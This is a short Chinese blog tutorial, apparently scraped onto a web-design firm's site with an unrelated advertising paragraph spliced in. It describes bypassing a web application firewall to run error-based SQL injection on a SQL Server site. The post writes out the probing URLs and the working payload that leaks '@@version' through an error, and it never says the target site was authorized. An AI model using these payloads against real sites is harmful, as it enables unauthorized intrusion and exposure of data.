一个非常简单的WAF绕过。。
0x00 前言
确实是非常简单,如果是新手的话,我希望能给你带来一些思路,老鸟的话就emm...
创新互联建站是专业的秀峰网站建设公司,秀峰接单;提供成都网站设计、成都网站建设,网页设计,网站设计,建网站,PHP网站建设等专业做网站服务;采用PHP框架,可快速的进行秀峰网站开发网页制作和功能扩展;专业做搜索引擎喜爱的网站,专业的做网站团队,希望更多企业前来合作!
0x01 起因
工具扫到了一个有sqlserver特性的站点
通常出现这种错误信息,说明该站点配置不当,错误信息会直接显示,也没用强制类型转换的信息,那么一般就有报错型注入了!来检测一下
却出现了WAF的信息
0x02 fuzz
遇到WAF首先得先看看是什么关键字触发了拦截请求,所以我们先进行简单的调试
http://xxxx/xxxx.aspx?xxxx=1' and --a
语法出错是很正常的,因为我们添加了and且后面没任何值,所以我们可以假设语句变成了
select xxx from xxx where xxxx=1' and --a
但我们发现其实并没有触发WAF,说明and关键字并没有在过滤的列表当中,继续尝试
http://xxxx/xxxx.aspx?xxxx=1' and 1=1 --a
竟然触发了WAF,经过多次调试,发现是and后面居然不能带数字。。这样就不会报错了
http://xxxx/xxxx.aspx?xxxx=1' and a=1 --a
那么再次尝试下原来的代码,将顺序调整,成功!
http://xxxx/xxxx.aspx?xxxx=1' and @@version=1 --a
本文名称:一个非常简单的WAF绕过。。
当前地址:http://pwwzsj.com/article/ipsspj.html